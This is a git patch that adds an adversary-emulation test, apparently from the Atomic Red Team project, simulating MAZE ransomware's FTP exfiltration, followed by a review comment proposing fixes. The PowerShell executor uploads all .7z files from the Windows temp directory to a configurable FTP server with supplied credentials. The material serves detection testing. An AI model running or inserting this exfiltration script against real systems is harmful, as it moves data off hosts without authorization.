From df1f3bf6cedc645f7264bc5371343533ce5d0fcf Mon Sep 17 00:00:00 2001
From: Leo Verlod <96517806+Leomon5@users.noreply.github.com>
Date: Tue, 17 May 2022 11:51:09 -0500
Subject: [PATCH] Create T1560.003 Test 1 (#1967)

* Create T1560.003 test 1

* Add T1048.003 Test 6

* Delete T1560.003 (moved to T1048.003

Co-authored-by: Carrie Roberts
---
 atomics/T1048.003/T1048.003.yaml | 42 ++++++++++++++++++++++++++++++++
 1 file changed, 42 insertions(+)

diff --git a/atomics/T1048.003/T1048.003.yaml b/atomics/T1048.003/T1048.003.yaml
index a191cb14..d49ea113 100644
--- a/atomics/T1048.003/T1048.003.yaml
+++ b/atomics/T1048.003/T1048.003.yaml
@@ -116,3 +116,45 @@ atomic_tests:
 description: SMTP server to use for email transportation
 type: String
 default: "127.0.0.1"
+- name: MAZE FTP Upload
+ description: |
+ This test simulates MAZE's ransomware's ability to exfiltrate data via FTP.
+ Upon successful execution, all 7z files within the %windir%\temp directory will be uploaded to a remote FTP server.
+ Reference: https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
+ supported_platforms:
+ - windows
+ input_arguments:
+ ftp_server:
+ description: FTP Server address
+ type: String
+ default: 127.0.0.1
+ username:
+ description: Username for FTP server login
+ type: String
+ default:
+ password:
+ description: Password for FTP server login
+ type: String
+ default:
+ executor:
+ command: |
+ $Dir_to_copy = "$env:windir\temp"
+ $ftp = "ftp://#{ftp_server}/"
+ $web_client = New-Object System.Net.WebClient
+ $web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')
+ if (test-connection -count 1 -computername "#{ftp_server}" -quiet)
+ {foreach($file in (dir $Dir_to_copy "*.7z"))
+ {echo "Uploading $file..."
+ $uri = New-Object System.Uri($ftp+$file.name)
+ $web_client.UploadFile($uri, $file.FullName)}}
+ else
+ {echo "FTP Server Unreachable. Please verify the server address in input args and try again."}
+ cleanup_command: |
+ $ftp = "ftp://#{ftp_server}/"
+ try {foreach ($file in (dir "$env:windir\temp" "*.7z"))
+ {$uri = New-Object System.Uri($ftp+$file.name)
+ $ftp_del = [System.Net.FtpWebRequest]::create($uri)
+ $ftp_del.Credentials = New-Object System.Net.NetworkCredential('#{username}','#{password}')
+ $ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile
+ $ftp_del.GetResponse()}} catch{}
+ name: powershell
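Review bot: The executor only uploads `*.7z` files that already exist in `$env:windir\temp`, but the new test declares no `dependencies`, so on a host with no such files the `foreach` body never runs and the test exits successfully without generating any FTP traffic, which makes any detection validated against it vacuous; a `dependencies` entry whose `prereq_command` checks for a `.7z` and whose `get_prereq_command` drops a sample one (sketched below, to sit between `input_arguments` and `executor`) closes that gap. The reachability gate uses `test-connection`, which is ICMP, so an FTP host that drops ping is reported as "FTP Server Unreachable" even when port 21 is open; `Test-NetConnection -ComputerName "#{ftp_server}" -Port 21 -InformationLevel Quiet` probes the service the test actually uses. `#{username}` and `#{password}` are substituted into single-quoted PowerShell literals in both `command` and `cleanup_command`, so a value containing `'` breaks the script; since substitution happens before PowerShell parses the text, the realistic fix is to state that restriction in the two argument descriptions. Listing `%windir%\temp` may not be permitted for a non-admin user on a default install — worth confirming and, if so, adding `elevation_required: true`.
```yaml
# … unchanged: name, description, supported_platforms, input_arguments …
  dependency_executor_name: powershell
  dependencies:
  - description: |
      At least one .7z file must exist in %windir%\temp, otherwise nothing is uploaded
    prereq_command: |
      if (Get-ChildItem "$env:windir\temp" -Filter "*.7z") { exit 0 } else { exit 1 }
    get_prereq_command: |
      "Sample data for T1048.003 FTP exfiltration test" | Out-File "$env:windir\temp\T1048.003_sample.7z"
  executor:
# … unchanged: command, cleanup_command, name …
```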